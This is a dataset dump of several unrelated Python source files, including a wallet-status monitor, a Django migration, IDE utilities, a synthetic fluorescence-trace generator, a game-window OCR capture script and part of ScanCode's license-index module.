filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_6102 | from argparse import ArgumentParser
from datetime import datetime, timedelta
import pytz
import time
import curses
from attrdict import AttrDict
from hydra.app import HydraApp
from hydra.rpc.base import BaseRPC
from hydra.test import Test
COLOR_GOOD = 2
COLOR_WARN = 8
COLOR_ERROR = 4
COLOR_ETC = 10
@HydraApp.register(name="top", desc="Show status periodically", version="0.1")
class TopApp(HydraApp):
scr = None
ljust = None
@staticmethod
def parser(parser: ArgumentParser):
parser.add_argument("-i", "--interval", type=float, default=10, help="polling interval.")
parser.add_argument("-c", "--count", type=int, default=None, help="exit after (count) iterations.")
parser.add_argument("-z", "--timezone", type=str, default="America/Los_Angeles", help="time zone.")
parser.add_argument("-C", "--curses", action="store_true", help="use curses display.")
parser.add_argument("-x", "--extended", action="store_true", help="show extended info.")
def setup(self):
super().setup()
self.ljust = (30 if not self.args.full else 40)
if self.args.curses:
self._curses_setup()
def run(self):
interval = self.args.interval
count = self.args.count
display = self.display if not self.args.curses else self.display_curses
try:
while True:
display()
if count is not None:
count -= 1
if count <= 0:
break
time.sleep(interval)
finally:
if self.args.curses:
self._curses_cleanup()
def read(self):
result = AttrDict()
result.now = datetime.now(tz=pytz.timezone(self.args.timezone))
result.utcnow = datetime.utcnow()
result.connectioncount = self.rpc.getconnectioncount()
result.apr = self.rpc.getestimatedannualroi()
stakinginfo = self.rpc.getstakinginfo()
stakinginfo["search-interval"] = timedelta(seconds=stakinginfo["search-interval"])
stakinginfo.expectedtime = timedelta(seconds=stakinginfo.expectedtime)
stakinginfo.weight /= 10**8
stakinginfo.netstakeweight /= 10**8
if "errors" in stakinginfo and not stakinginfo.errors:
del stakinginfo["errors"]
if not self.args.extended:
TopApp.__try_delete(stakinginfo, "pooledtx")
result.stakinginfo = stakinginfo
walletinfo = self.rpc.getwalletinfo()
if "unlocked_until" in walletinfo:
walletinfo.unlocked_until = datetime.fromtimestamp(walletinfo.unlocked_until)
if not self.args.extended:
TopApp.__try_delete(walletinfo, "walletversion")
TopApp.__try_delete(walletinfo, "keypoololdest")
TopApp.__try_delete(walletinfo, "keypoolsize")
TopApp.__try_delete(walletinfo, "keypoolsize_hd_internal")
TopApp.__try_delete(walletinfo, "paytxfee")
TopApp.__try_delete(walletinfo, "private_keys_enabled")
if "unconfirmed_balance" in walletinfo and not walletinfo.unconfirmed_balance:
del walletinfo.unconfirmed_balance
if "immature_balance" in walletinfo and not walletinfo.immature_balance:
del walletinfo.immature_balance
TopApp.__try_delete(walletinfo, "hdseedid")
if not len(walletinfo.walletname) and not self.args.json:
walletinfo.walletname = "''"
result.walletinfo = walletinfo
if self.args.extended:
mininginfo = self.rpc.getmininginfo()
if "errors" in mininginfo and not mininginfo.errors:
del mininginfo.errors
if "warnings" in mininginfo and not mininginfo.warnings:
del mininginfo.warnings
result.mininginfo = mininginfo
return result
# noinspection PyShadowingBuiltins
def display(self, print=print):
result = self.read()
if not self.args.json:
for key, value in result.items():
if not isinstance(value, AttrDict):
print(key.ljust(self.ljust) + str(value))
else:
print()
self.render(value, name=key, print_fn=print, ljust=self.ljust)
else:
self.render(result, name="top", print_fn=print, ljust=self.ljust)
def display_curses(self):
self.scr.clear()
self.display(print=self.__print_curses)
self.scr.refresh()
def __print_curses(self, text=""):
text = str(text)
if not text.endswith("\n"):
text += "\n"
return self.scr.addstr(text)
@staticmethod
def __try_delete(dic: dict, key: str):
if key in dic:
del dic[key]
# noinspection PyMethodMayBeStatic
def _curses_cleanup(self):
curses.echo()
curses.nocbreak()
curses.endwin()
def _curses_setup(self):
self.scr = curses.initscr()
curses.noecho()
curses.cbreak()
curses.start_color()
curses.use_default_colors()
if curses.can_change_color():
curses.init_color(curses.COLOR_BLACK, 0, 0, 0)
curses.init_color(curses.COLOR_WHITE, 255, 255, 255)
curses.init_color(curses.COLOR_GREEN, 0, 255, 0)
curses.init_color(curses.COLOR_YELLOW, 255, 255, 0)
curses.init_color(curses.COLOR_RED, 255, 0, 0)
curses.init_color(curses.COLOR_MAGENTA, 255, 0, 255)
curses.init_pair(1, curses.COLOR_WHITE, -1)
curses.init_pair(2, curses.COLOR_GREEN, -1)
curses.init_pair(3, curses.COLOR_YELLOW, -1)
curses.init_pair(4, curses.COLOR_RED, -1)
curses.init_pair(5, curses.COLOR_MAGENTA, -1)
curses.init_pair(6, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_GREEN)
curses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_YELLOW)
curses.init_pair(9, curses.COLOR_BLACK, curses.COLOR_RED)
curses.init_pair(10, curses.COLOR_YELLOW, -1)
@Test.register()
class TopAppTest(Test):
MY_FIRST_TEST_FIX = False
def test_0_top_runnable(self):
self.assertHydraAppIsRunnable(TopApp, "-h")
if __name__ == "__main__":
TopApp.main()
|
the-stack_0_6103 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('trackbuild', '0005_release_previous'),
]
operations = [
migrations.AlterField(
model_name='release',
name='previous',
field=models.ForeignKey(related_name='followers', to='trackbuild.Release', null=True),
),
migrations.AlterUniqueTogether(
name='release',
unique_together=set([('user', 'product', 'name', 'major', 'minor', 'patch')]),
),
]
|
the-stack_0_6104 | #-------------------------------------------------------------------------------
# Name: apputils.py
# Purpose:
#
# Author: wukan
#
# Created: 2019-01-08
# Copyright: (c) wukan 2019
# Licence: GPL-3.0
#-------------------------------------------------------------------------------
from noval import GetApp
import sys
import os
import time
import pyperclip
import psutil
import locale
import future.utils
MAINMODULE_DIR = "NOVAL_MAINMODULE_DIR"
#是否开发版本,在正式版本发行时需要设置为False,在内测版本时需要设置为True
isDev = False
def is_dev():
return isDev
def is_windows():
return os.name == 'nt'
def is_linux():
return os.name == "posix"
def is_py2():
return future.utils.PY2
def is_py3():
return future.utils.PY3
def is_py3_plus():
return sys.version_info[0] >= 3
def get_default_encoding():
try:
return locale.getpreferredencoding()
except:
return locale.getdefaultlocale()[1]
def get_default_locale():
return locale.getdefaultlocale()[0]
def _generateMainModuleDir():
mainModuleDir = os.getenv(MAINMODULE_DIR)
if mainModuleDir: # if environment variable set, return it
if is_windows():
if is_py2():
return mainModuleDir.decode(get_default_encoding())
return mainModuleDir
# On Mac, the python executable sometimes has a capital "P" so we need to
# lower the string first
sysExecLower = sys.executable.lower()
if sysExecLower == "/" or sysExecLower.find('python') != -1:
utilModuleDir = os.path.dirname(__file__)
if not os.path.isabs(utilModuleDir):
utilModuleDir = os.path.join(os.getcwd(), utilModuleDir)
mainModuleDir = os.path.normpath(os.path.join(utilModuleDir, os.path.join(os.path.pardir, os.path.pardir)))
if mainModuleDir.endswith('.zip'):
mainModuleDir = os.path.dirname(mainModuleDir) # Get rid of library.zip
else:
mainModuleDir = os.path.dirname(sys.executable)
os.environ[MAINMODULE_DIR] = mainModuleDir # pythonBug: os.putenv doesn't work, set environment variable
if is_windows():
if is_py2():
return mainModuleDir.decode(get_default_encoding())
return mainModuleDir
mainModuleDir = _generateMainModuleDir()
def getCommandNameForExecPath(execPath):
if isWindows():
return '"%s"' % execPath
return execPath
def getUserName():
if isWindows():
return os.getenv('USERNAME')
else:
# 06-Feb-06 [email protected] --
# this blows up the linux cc runs with "Inappropriate ioctl for device"
#return os.getlogin()
return os.getenv('USER')
def getCurrentTimeAsFloat():
return time.time()
systemStartTime = getCurrentTimeAsFloat()
def CopyToClipboard(str):
if is_windows():
pyperclip.copy(str)
else:
GetApp().clipboard_clear()
GetApp().clipboard_append(str)
def GetSupportableExtList():
exts = []
for template in GetApp().GetDocumentManager().GetTemplates():
filter = template.GetFileFilter()
parts = filter.split(";")
for part in parts:
ext = part.replace("*.","").strip()
exts.append(ext)
return exts
def is_ext_supportable(ext):
if ext == "":
return True
return ext.lower() in GetSupportableExtList()
def get_app_version():
# find version number from version.txt
versionFilepath = os.path.join(mainModuleDir, "version.txt")
if os.path.exists(versionFilepath):
versionfile = open(versionFilepath, 'r')
versionLines = versionfile.readlines()
versionfile.close()
version = "".join(versionLines)
else:
version = "Version Unknown - %s not found" % versionFilepath
return version
if is_py2():
from ConfigParser import ConfigParser
elif is_py3_plus():
from configparser import ConfigParser
def get_lang_config():
return int(get_config_value('IDE','Language',default_value=-1))
def get_config_path():
return os.path.join(mainModuleDir,"config.ini")
def get_config_value(section,key,default_value=None):
'''
读取配置文件的属性值
'''
config_path = get_config_path()
if not os.path.exists(config_path):
return default_value
cfg = ConfigParser()
cfg.read(config_path)
if not cfg.has_option(section,key):
return default_value
return cfg.get(section,key)
def write_cofig_value(section,key,value):
'''
初始化配置文件的属性值
'''
config_path = get_config_path()
cfg = ConfigParser()
if os.path.exists(config_path):
cfg.read(config_path)
if not cfg.has_section(section):
cfg.add_section(section)
if not cfg.has_option(section,key):
cfg.set(section, key,str(value))
with open(config_path,"w+") as f:
cfg.write(f)
|
the-stack_0_6105 | from test.cl_node.docker_node import DockerNode
from test.cl_node.casperlabs_accounts import Account
def test_scala_client_balance(one_node_network):
node: DockerNode = one_node_network.docker_nodes[0]
# This is only in scala client, need to verify we are using correct one.
node.use_docker_client()
acct1, acct2, acct3 = [Account(i) for i in range(1, 4)]
# Perform multiple transfers with end result of Acct1 = 200, Acct2 = 100, Acct3 = 700
hashes = node.transfer_to_accounts([(1, 1000), (2, 800, 1), (3, 700, 2)])
assert node.client.get_balance(account_address=acct1.public_key_hex, block_hash=hashes[-1]) == 200
assert node.client.get_balance(account_address=acct2.public_key_hex, block_hash=hashes[-1]) == 100
assert node.client.get_balance(account_address=acct3.public_key_hex, block_hash=hashes[-1]) == 700
|
the-stack_0_6107 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 8 03:32:57 2020
@author: Jon
"""
import numpy as np
from numpy import genfromtxt
import matplotlib.pyplot as plt
import pandas as pd
from numba import jit
def ms2_loading_coeff(kappa,W):
alpha = kappa
coeff = np.ones((1,W), dtype=float)
alpha_ceil = np.ceil(alpha)
alpha_floor = np.floor(alpha)
coeff[0:int(alpha_floor):1,0] = (np.linspace(1,int(alpha_floor), endpoint=True, num=int(alpha_floor)) - 0.5) / alpha
coeff[0,int(alpha_ceil)-1] = (alpha_ceil - alpha) + (alpha**2 - (alpha_ceil-1)**2) / (2*alpha)
return coeff
#seed_setter = np.random.randint(0,1000000000) # Make sure this is random for actual run
seed_setter = 957434
np.random.seed(seed_setter)
np.seterr(divide='ignore')
# Import data
signal_holder = genfromtxt('synthetic_promoter_traces_w13.csv', delimiter=',', skip_header=0)
synthetic_x = np.arange(0,100)
# =============================================================================
# plt.figure(0)
# plt.step(synthetic_x, signal_holder[40,:])
# =============================================================================
# Initialisation
K = 2
n_traces = len(signal_holder)
W = 13
compound_states = K**W
mu = np.zeros((K,1))
mu[0,0] = 282.27
mu[1,0] = 13889.8
noise = 16414.9
t_MS2 = 30
deltaT = 20
kappa = t_MS2 / deltaT
unique_lengths = np.expand_dims(np.asarray(100), axis = 0)
trace_length = 100
#%%
# More efficient stuff
# MS2 coefficient calculation
ms2_coeff = ms2_loading_coeff(kappa, W)
ms2_coeff_flipped = np.flip(ms2_coeff, 1)
count_reduction_manual = np.zeros((1,W-1))
for t in np.arange(0,W-1):
count_reduction_manual[0,t] = np.sum(ms2_coeff[0,t+1:])
count_reduction_manual = np.reshape(count_reduction_manual, (W-1,1))
@jit(nopython=True)
def get_adjusted(state, K, W, ms2_coeff):
#ms2_coeff_flipped = np.flip(ms2_coeff_flipped, 1)
ms2_coeff_flipped = ms2_coeff
one_accumulator = 0
zero_accumulator = 0
for count in np.arange(0,W):
#print(count)
#print(state&1)
if state & 1 == 1:
#print('one')
one_accumulator = one_accumulator + ms2_coeff_flipped[0,count]
else:
#print('zero')
zero_accumulator = zero_accumulator + ms2_coeff_flipped[0,count]
state = state >> 1
#print(state)
return_list = []
return_list.append(one_accumulator)
return_list.append(zero_accumulator)
return return_list
@jit(nopython=True)
def compute_dynamic_F(state, length, W, K, ms2_coeff_flipped, count_reduction_manual):
#print(datetime.datetime.now().time())
trace_length = length
state_flipped = K**W - state - 1
adjust = get_adjusted(state_flipped, K, W, ms2_coeff)
adjust_ones = adjust[0]
adjust_zeros = adjust[1]
F1_log = np.log(adjust_ones)
F0_log = np.log(adjust_zeros)
log_f0_terms = np.zeros((1, trace_length))
for i in np.arange(0, trace_length):
log_f0_terms[0,i] = F0_log
log_f1_terms_saved = np.zeros((1, trace_length))
for i in np.arange(0, trace_length):
log_f1_terms_saved[0,i] = F1_log
#log_f1_terms_saved2 = log_f1_terms_saved
for t in np.arange(0,W-1):
#print('top')
#print(np.exp(log_f1_terms_saved[0,t]))
#print('bottom')
#print(count_reduction_manual[t,])
#print(abs(float(np.exp(log_f1_terms_saved[0,t])) - count_reduction_manual[t,]))
inter = float(np.exp(log_f1_terms_saved[0,t])) - count_reduction_manual[t,]
log_f1_terms_saved[0,t] = np.log(abs(inter[0,]))
log_F_terms = []
log_F_terms.append(log_f1_terms_saved)
log_F_terms.append(log_f0_terms)
#print(datetime.datetime.now().time())
return log_F_terms
mask = np.int32((2**W)-1)
fluorescence_holder = np.zeros((100,100))
for i in np.arange(0, len(fluorescence_holder)):
single_promoter = np.expand_dims(signal_holder[i,:], axis = 0)
single_trace = np.zeros((1,100))
t = 0
window_storage = int(single_promoter[0,0])
#single_trace[0,t] = ((F_on_viewer[window_storage, t] * mu[1,0]) + (F_off_viewer[window_storage, t] * mu[0,0])) + np.random.normal(0, noise)
single_trace[0,t] = ((get_adjusted(window_storage, K, W, ms2_coeff)[0] * mu[1,0]) + (get_adjusted(window_storage, K, W, ms2_coeff)[1] * mu[0,0])) + + np.random.normal(0, noise)
window_storage = 0
t = 1
present_state_list = []
present_state_list.append(int(single_promoter[0,0]))
#while t < W:
while t < 100:
present_state = int(single_promoter[0,t])
#print('present state')
#print(present_state)
#present_state_list.append(present_state)
window_storage = np.bitwise_and((present_state_list[t-1] << 1) + present_state, mask)
#print('window storage')
#print(window_storage)
present_state_list.append(window_storage)
#single_trace[0,t] = ((F_on_viewer[window_storage, t] * mu[1,0]) + (F_off_viewer[window_storage, t] * mu[0,0])) + np.random.normal(0, noise)
single_trace[0,t] = ((get_adjusted(window_storage, K, W, ms2_coeff)[0] * mu[1,0]) + (get_adjusted(window_storage, K, W, ms2_coeff)[1] * mu[0,0])) + + np.random.normal(0, noise)
t = t + 1
fluorescence_holder[i,:] = single_trace
# =============================================================================
# plt.figure(2)
# plt.plot(synthetic_x, single_trace.flatten(), c='b')
# =============================================================================
sampling_dataframe = pd.DataFrame(fluorescence_holder)
sampling_dataframe.to_csv("synthetic_fluorescent_traces_w13.csv")
#transition_probabilities = [0.9 0.1;0.35 0.65];
#%%
# =============================================================================
# for j in np.arange(3,15):
# plt.figure(j)
# plt.plot(synthetic_x, fluorescence_holder[j,:].flatten())
#
# plt.figure(15)
# plt.step(synthetic_x, signal_holder[40,:])
# plt.figure(16)
# plt.plot(synthetic_x, fluorescence_holder[40,:].flatten())
#
# plt.figure(17)
# plt.step(synthetic_x, signal_holder[42,:])
# plt.figure(18)
# plt.plot(synthetic_x, fluorescence_holder[42,:].flatten())
#
# =============================================================================
|
the-stack_0_6108 | import time
import win32gui
import win32ui
import win32con
import win32api
from cnocr import CnOcr
import os
def window_capture(filename, pofw, pofh, wpct, hpct, imgfmt):
"""capture specified window and specified screen area's filename.jpg image by win32gui"""
# 获取指定名称进程的窗口号
hwnd = win32gui.FindWindow(None, "Rainbow Six")
# hwnd = 0 # 窗口的编号,0号表示当前活跃窗口
# 根据窗口句柄获取窗口的设备上下文DC(Device Context)
hwndDC = win32gui.GetWindowDC(hwnd)
# 根据窗口的DC获取mfcDC
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
# mfcDC创建可兼容的DC
saveDC = mfcDC.CreateCompatibleDC()
# 创建bigmap准备保存图片
saveBitMap = win32ui.CreateBitmap()
# 获取监控器信息
MoniterDev = win32api.EnumDisplayMonitors(None, None)
w = MoniterDev[0][2][2]
h = MoniterDev[0][2][3]
# print(w, h) # 图片大小
# 为bitmap开辟空间
sspw = int(round(pofw*w))
ssph = int(round(pofh*h))
ssw = int(round(wpct*w))
ssh = int(round(hpct*h))
print(ssw, ssh)
saveBitMap.CreateCompatibleBitmap(mfcDC, ssw, ssh)
# 高度saveDC,将截图保存到saveBitmap中
saveDC.SelectObject(saveBitMap)
fullfilename = filename+imgfmt
# 截取从左上角(0,0)长宽为(w,h)的图片
saveBitMap.SaveBitmapFile(saveDC, fullfilename)
saveDC.BitBlt((0, 0), (ssw, ssh), mfcDC,
(sspw, ssph), win32con.SRCCOPY)
saveBitMap.SaveBitmapFile(saveDC, fullfilename)
"""win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
"""
def main():
listofimgfpt = ['.jpg', '.png', '.bmp']
for i in range(7200):
beg = time.time()
print(i)
targetname = "r6ss" + str(i)
window_capture(targetname, pofw=0.6546875, pofh=0.8791666,
wpct=0.10546875, hpct=0.0597222, imgfmt=listofimgfpt[0])
fulltargetname = targetname + listofimgfpt[0]
res = CnOcr(model_name='densenet-s-gru', context='cpu',
root="C:/Users/Noone/AppData/Roaming/cnocr").ocr(fulltargetname)
with open("test.txt", "a") as f:
f.write(str(res)+" \r")
print(res)
targetpath = "D:/Onedrive/R6S_spider/"+fulltargetname
time.sleep(2)
if res == []:
os.remove(targetpath)
end = time.time()
print(end - beg)
return 0
if __name__ == '__main__':
main()
|
the-stack_0_6110 | # -*- coding: utf-8 -*-
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from array import array
from collections import Counter
from collections import defaultdict
try:
import cPickle
except ImportError:
import pickle as cPickle
from functools import partial
from operator import itemgetter
import pickle
import sys
from time import time
# Python 2 and 3 support
try:
import itertools.izip as zip # NOQA
except ImportError:
pass
from intbitset import intbitset
from six import string_types
from commoncode.dict_utils import sparsify
from licensedcode import MAX_DIST
from licensedcode import SMALL_RULE
from licensedcode.legalese import common_license_words
from licensedcode import match
from licensedcode import match_aho
from licensedcode import match_hash
from licensedcode import match_seq
from licensedcode import match_set
from licensedcode import match_spdx_lid
from licensedcode.dmp import match_blocks as match_blocks_dmp
from licensedcode.seq import match_blocks as match_blocks_seq
from licensedcode import query
from licensedcode import tokenize
"""
Main license index construction, query processing and matching entry points for
license detection.
The LicenseIndex is the main class and holds the index structures. The `match`
method drives the matching using a succession of matching strategies. Actual
matching is delegated to other modules that implement a matching strategy.
"""
# Tracing flags
TRACE = False
TRACE_NEGATIVE = False
TRACE_APPROX = False
TRACE_APPROX_CANDIDATES = False
TRACE_APPROX_MATCHES = False
TRACE_INDEXING_PERF = False
TRACE_TOKEN_DOC_FREQ = False
def logger_debug(*args):
pass
if (TRACE or TRACE_NEGATIVE
or TRACE_APPROX or TRACE_APPROX_CANDIDATES or TRACE_APPROX_MATCHES
or TRACE_INDEXING_PERF):
import logging
logger = logging.getLogger(__name__)
# logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, string_types) and a or repr(a)
for a in args))
############################## Feature SWITCHES ################################
########## Ngram fragments detection
USE_AHO_FRAGMENTS = False
# length of ngrams used for fragments detection
AHO_FRAGMENTS_NGRAM_LEN = 6
########## Query run breaking using rule starts
# Feature switch to enable or not extra query run breaking based on rule starts
USE_RULE_STARTS = False
########## Use Bigrams instead of tokens
# Enable using an bigrams for multisets/bags instead of tokens
USE_BIGRAM_MULTISETS = False
########## Use diff match patch myers diff for approx matching
# Enable using an bigrams for multisets/bags instead of tokens
USE_DMP = False
############################## Feature SWITCHES ################################
# Maximum number of unique tokens we can handle: 16 bits signed integers are up
# to 32767. Since we use internally several arrays of ints for smaller and
# optimized storage we cannot exceed this number of tokens.
MAX_TOKENS = (2 ** 15) - 1
class LicenseIndex(object):
"""
A license detection index. An index is queried for license matches found in
a query file. The index support multiple strategies for finding exact and
approximate matches.
"""
# slots are not really needed but they help with sanity and avoid an
# unchecked proliferation of new attributes
__slots__ = (
'len_tokens',
'len_legalese',
'dictionary',
'digit_only_tids',
'tokens_by_tid',
'rules_by_rid',
'tids_by_rid',
'high_postings_by_rid',
'sets_by_rid',
'msets_by_rid',
'rid_by_hash',
'rules_automaton',
'fragments_automaton',
'negative_automaton',
'starts_automaton',
'regular_rids',
'negative_rids',
'false_positive_rids',
'approx_matchable_rids',
'optimized',
)
def __init__(self, rules=None, _legalese=common_license_words, _spdx_tokens=frozenset()):
"""
Initialize the index with an iterable of Rule objects.
`_legalese` is a set of common license-specific words aka. legalese
`_spdx_tokens` is a set of tokens used in SPDX license identifiers
"""
# total number of unique known tokens
self.len_tokens = 0
# largest token ID for a "legalese" token. A token with a larger id than
# len_legalese is considered a "junk" very common token
self.len_legalese = 0
# mapping of token string > token id
self.dictionary = {}
# set of token ids made entirely of digits
self.digit_only_tids = set()
# mapping-like of token id -> token string as a list where the index is the
# token id and the value the actual token string.
# This the reverse of the dictionary.
self.tokens_by_tid = []
# Note: all the following are mappings-like (using lists) of
# rid-> data are lists of data where the index is the rule id.
# maping-like of rule_id -> rule objects proper
self.rules_by_rid = []
# maping-like of rule_id -> sequence of token_ids
self.tids_by_rid = []
# mapping-like of rule id->(mapping of (token_id->[positions, ...])
# We track only high/good tokens there. This is a "traditional"
# inverted index postings list
self.high_postings_by_rid = []
# mapping-like of rule_id -> tokens ids sets/multisets
self.sets_by_rid = []
self.msets_by_rid = []
# mapping of hash -> single rid for hash match: duplicated rules are not allowed
self.rid_by_hash = {}
# Aho-Corasick automatons for regular and negative rules
self.rules_automaton = match_aho.get_automaton()
self.fragments_automaton = USE_AHO_FRAGMENTS and match_aho.get_automaton()
self.negative_automaton = match_aho.get_automaton()
self.starts_automaton = USE_RULE_STARTS and match_aho.get_automaton()
# disjunctive sets of rule ids: regular, negative, false positive
# TODO: consider using intbitset instead
self.regular_rids = set()
self.negative_rids = set()
self.false_positive_rids = set()
# These rule ids are for rules that can be matched with a sequence
# match. Other rules can only be matched exactly
self.approx_matchable_rids = set()
# if True the index has been optimized and becomes read only:
# no new rules can be added
self.optimized = False
if rules:
if TRACE_INDEXING_PERF:
start = time()
print('LicenseIndex: building index.')
# index all and optimize
self._add_rules(
rules, _legalese=_legalese, _spdx_tokens=_spdx_tokens)
if TRACE_TOKEN_DOC_FREQ:
print('LicenseIndex: token, frequency')
from itertools import chain
tf = Counter(chain.from_iterable(tids for rid, tids
in enumerate(self.tids_by_rid)
if rid in self.regular_rids))
if TRACE_INDEXING_PERF:
duration = time() - start
len_rules = len(self.rules_by_rid)
print('LicenseIndex: built index with %(len_rules)d rules in '
'%(duration)f seconds.' % locals())
self._print_index_stats()
def _add_rules(self, rules, _legalese=common_license_words, _spdx_tokens=frozenset()):
"""
Add a list of Rule objects to the index and constructs optimized and
immutable index structures.
`_legalese` is a set of common license-specific words aka. legalese
`_spdx_tokens` is a set of token strings used in SPDX license identifiers
"""
if self.optimized:
raise Exception('Index has been optimized and cannot be updated.')
# initial dictionary mapping for known legalese tokens
########################################################################
# FIXME: we should start at 1, and ids are become valid unichr values
self.dictionary = dictionary = {
ts: tid for tid, ts in enumerate(sorted(_legalese))}
dictionary_get = dictionary.get
self.len_legalese = len_legalese = len(dictionary)
highest_tid = len_legalese - 1
# Add SPDX key tokens to the dictionary
# these are always treated as non-legalese
########################################################################
for sts in _spdx_tokens:
stid = dictionary_get(sts)
if stid is None:
# we have a never yet seen token, so we assign a new tokenid
highest_tid += 1
stid = highest_tid
dictionary[sts] = stid
# OPTIMIZED
sparsify(dictionary)
self.rules_by_rid = rules_by_rid = list(rules)
len_rules = len(rules_by_rid)
# create index data structures
# OPTIMIZATION: bind frequently used methods to the local scope for index structures
########################################################################
tids_by_rid_append = self.tids_by_rid.append
false_positive_rids_add = self.false_positive_rids.add
negative_rids_add = self.negative_rids.add
regular_rids_add = self.regular_rids.add
approx_matchable_rids_add = self.approx_matchable_rids.add
# since we only use these for regular rules, these lists may be sparse.
# their index is the rule rid
self.high_postings_by_rid = high_postings_by_rid = [None] * len_rules
self.sets_by_rid = sets_by_rid = [None] * len_rules
self.msets_by_rid = msets_by_rid = [None] * len_rules
# track all duplicate rules: fail and report dupes at once at the end
dupe_rules_by_hash = defaultdict(list)
# build partials for methods that populate automatons
negative_automaton_add = partial(match_aho.add_sequence,
automaton=self.negative_automaton, with_duplicates=False)
rules_automaton_add = partial(match_aho.add_sequence,
automaton=self.rules_automaton, with_duplicates=False)
if USE_AHO_FRAGMENTS:
fragments_automaton_add = partial(match_aho.add_sequence,
automaton=self.fragments_automaton, with_duplicates=True)
if USE_RULE_STARTS:
starts_automaton_add_start = partial(match_aho.add_start,
automaton=self.starts_automaton)
# OPTIMIZED: bind frequently used objects to local scope
rid_by_hash = self.rid_by_hash
match_hash_index_hash = match_hash.index_hash
match_set_tids_set_counter = match_set.tids_set_counter
match_set_multiset_counter = match_set.multiset_counter
len_starts = SMALL_RULE
min_len_starts = SMALL_RULE * 6
ngram_len = AHO_FRAGMENTS_NGRAM_LEN
# Index each rule
########################################################################
for rid, rule in enumerate(rules_by_rid):
# assign rid
rule.rid = rid
rule_token_ids = array('h', [])
tids_by_rid_append(rule_token_ids)
# A rule is weak if it does not contain at least one legalese word:
# we consider all rules to be weak until proven otherwise below.
# "weak" rules can only be matched with an automaton.
is_weak = True
for rts in rule.tokens():
rtid = dictionary_get(rts)
if rtid is None:
# we have a never yet seen token, so we assign a new tokenid
# note: we could use the length of the dictionary instead
highest_tid += 1
rtid = highest_tid
dictionary[rts] = rtid
if is_weak and rtid < len_legalese:
is_weak = False
rule_token_ids.append(rtid)
# build hashes index and check for duplicates rule texts
rule_hash = match_hash_index_hash(rule_token_ids)
dupe_rules_by_hash[rule_hash].append(rule)
# classify rules and build disjuncted sets of rids
if rule.is_negative:
# negative rules are matched early and their tokens are only
# exactly matched. When matched as a whole, their tokens are
# removed from the token stream
negative_rids_add(rid)
negative_automaton_add(tids=rule_token_ids, rid=rid)
continue
####################
# populate automaton with the whole rule tokens sequence, for all
# RULEs, be they "standard"/regular, weak, false positive or small
# (but not negative)
####################
rules_automaton_add(tids=rule_token_ids, rid=rid)
if rule.is_false_positive:
# False positive rules do not participate in the set or sequence
# matching at all: they are used for exact matching and in post-
# matching filtering
false_positive_rids_add(rid)
continue
# from now on, we have regular rules
rid_by_hash[rule_hash] = rid
regular_rids_add(rid)
# Some rules cannot be matched as a sequence are "weak" rules
if not is_weak:
approx_matchable_rids_add(rid)
####################
# update high postings: positions by high tids used to
# speed up sequence matching
####################
# no postings for rules that cannot be matched as a sequence (too short and weak)
# TODO: this could be optimized with a group_by
postings = defaultdict(list)
for pos, tid in enumerate(rule_token_ids):
if tid < len_legalese:
postings[tid].append(pos)
# OPTIMIZED: for speed and memory: convert postings to arrays
postings = {tid: array('h', value) for tid, value in postings.items()}
# OPTIMIZED: for speed, sparsify dict
sparsify(postings)
high_postings_by_rid[rid] = postings
####################
# ... and ngram fragments: compute ngrams and populate an automaton with ngrams
####################
if USE_AHO_FRAGMENTS and rule.minimum_coverage < 100 and rule.length > ngram_len:
all_ngrams = tokenize.ngrams(rule_token_ids, ngram_length=ngram_len)
all_ngrams_with_pos = tokenize.select_ngrams(all_ngrams, with_pos=True)
# all_ngrams_with_pos = enumerate(all_ngrams)
for pos, ngram in all_ngrams_with_pos:
fragments_automaton_add(tids=ngram, rid=rid, start=pos)
####################
# use the start and end of this rule as a break point for query runs
####################
if USE_RULE_STARTS and rule.length > min_len_starts:
starts_automaton_add_start(
tids=rule_token_ids[:len_starts],
rule_identifier=rule.identifier,
rule_length=rule.length)
####################
# build sets and multisets indexes, for all regular rules as we need
# the thresholds
####################
tids_set, mset = match_set.build_set_and_mset(
rule_token_ids, _use_bigrams=USE_BIGRAM_MULTISETS)
sets_by_rid[rid] = tids_set
msets_by_rid[rid] = mset
####################################################################
####################################################################
# FIXME!!!!!!! we should store them: we need them and we recompute
# them later at match time
tids_set_high = match_set.high_tids_set_subset(
tids_set, len_legalese)
mset_high = match_set.high_multiset_subset(
mset, len_legalese, _use_bigrams=USE_BIGRAM_MULTISETS)
# FIXME!!!!!!!
####################################################################
####################################################################
####################
# update rule thresholds
####################
rule.length_unique = match_set_tids_set_counter(tids_set)
rule.high_length_unique = match_set_tids_set_counter(tids_set_high)
rule.high_length = match_set_multiset_counter(mset_high)
rule.compute_thresholds()
########################################################################
# Finalize index data structures
########################################################################
# some tokens are made entirely of digits and these can create some
# worst case behavior when there are long runs on these
